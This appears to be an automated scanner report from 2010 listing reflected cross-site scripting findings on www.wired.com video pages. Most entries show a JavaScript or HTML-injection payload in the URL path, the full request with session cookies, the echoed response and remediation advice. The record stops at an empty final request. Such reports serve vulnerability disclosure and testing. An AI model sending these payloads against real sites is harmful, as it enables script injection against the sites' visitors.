GET /video/security5b027"><a>b24f73bee4d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:56:58 GMT Date: Mon, 22 Nov 2010 00:52:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106611
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_security5b027"><a>b24f73bee4d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66457"-alert(1)-"8080235918c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/security66457"-alert(1)-"8080235918c HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:58:10 GMT Date: Mon, 22 Nov 2010 00:53:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106716
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6eaf0--><script>alert(1)</script>b17d17bd8db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video6eaf0--><script>alert(1)</script>b17d17bd8db/stars-line-up-for-tron-game--evolution/645408465001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29465 Vary: Accept-Encoding Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:57:53 GMT Date: Mon, 22 Nov 2010 00:52:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video6eaf0--><script>alert(1)</script>b17d17bd8db/stars-line-up-for-tron-game--evolution/645408465001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4d8"><a>7a613a7e74e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video3b4d8"><a>7a613a7e74e/stars-line-up-for-tron-game--evolution/645408465001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29432 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:10 GMT Date: Mon, 22 Nov 2010 00:52:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video3b4d8"><a>7a613a7e74e ss_stars-line-up-for-tron-game--evolution c_645408465001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d824"-alert(1)-"d4829406e77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/stars-line-up-for-tron-game--evolution3d824"-alert(1)-"d4829406e77/645408465001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=279 Expires: Mon, 22 Nov 2010 00:58:45 GMT Date: Mon, 22 Nov 2010 00:54:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106779
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abd75"><a>4bcfe5fa8de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/stars-line-up-for-tron-game--evolutionabd75"><a>4bcfe5fa8de/645408465001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:57:35 GMT Date: Mon, 22 Nov 2010 00:53:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106792
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_stars-line-up-for-tron-game--evolutionabd75"><a>4bcfe5fa8de c_645408465001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2769"-alert(1)-"afb5406fedf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/stars-line-up-for-tron-game--evolution/645408465001f2769"-alert(1)-"afb5406fedf HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:55 GMT Date: Mon, 22 Nov 2010 00:54:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 437aa"><a>4f2862441ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/stars-line-up-for-tron-game--evolution/645408465001437aa"><a>4f2862441ba HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=284 Expires: Mon, 22 Nov 2010 00:58:56 GMT Date: Mon, 22 Nov 2010 00:54:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106772
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_stars-line-up-for-tron-game--evolution c_645408465001437aa"><a>4f2862441ba"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de6de"><a>cf9acababf3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videode6de"><a>cf9acababf3/the-casting-of-galaxy-quest/21738564001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29408 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:56:12 GMT Date: Mon, 22 Nov 2010 00:51:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videode6de"><a>cf9acababf3 ss_the-casting-of-galaxy-quest c_21738564001"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload c29b5--><script>alert(1)</script>ce95a1bfb75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoc29b5--><script>alert(1)</script>ce95a1bfb75/the-casting-of-galaxy-quest/21738564001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29442 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:56:46 GMT Date: Mon, 22 Nov 2010 00:51:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoc29b5--><script>alert(1)</script>ce95a1bfb75/the-casting-of-galaxy-quest/21738564001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84baf"><a>3f47118c743 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/the-casting-of-galaxy-quest84baf"><a>3f47118c743/21738564001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:56:40 GMT Date: Mon, 22 Nov 2010 00:51:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_the-casting-of-galaxy-quest84baf"><a>3f47118c743 c_21738564001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec059"-alert(1)-"4c1b2a1edb6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/the-casting-of-galaxy-questec059"-alert(1)-"4c1b2a1edb6/21738564001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:57:36 GMT Date: Mon, 22 Nov 2010 00:52:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa4f5"-alert(1)-"e85296498e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/the-casting-of-galaxy-quest/21738564001fa4f5"-alert(1)-"e85296498e4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=280 Expires: Mon, 22 Nov 2010 00:58:24 GMT Date: Mon, 22 Nov 2010 00:53:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 741cf"><a>d0dc860e958 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/the-casting-of-galaxy-quest/21738564001741cf"><a>d0dc860e958 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:57:30 GMT Date: Mon, 22 Nov 2010 00:52:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_the-casting-of-galaxy-quest c_21738564001741cf"><a>d0dc860e958"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24ae1"><a>6b2b010dbae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video24ae1"><a>6b2b010dbae/wired-magazine HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29356 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:56:20 GMT Date: Mon, 22 Nov 2010 00:51:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video24ae1"><a>6b2b010dbae ss_wired-magazine"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ea593--><script>alert(1)</script>4f1270fd104 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoea593--><script>alert(1)</script>4f1270fd104/wired-magazine HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29404 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:12 GMT Date: Mon, 22 Nov 2010 00:52:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoea593--><script>alert(1)</script>4f1270fd104/wired-magazine --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfc46"-alert(1)-"1b8a9910d86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/wired-magazinebfc46"-alert(1)-"1b8a9910d86 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:58:12 GMT Date: Mon, 22 Nov 2010 00:53:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106698
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d785"><a>b9ac96fbebb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
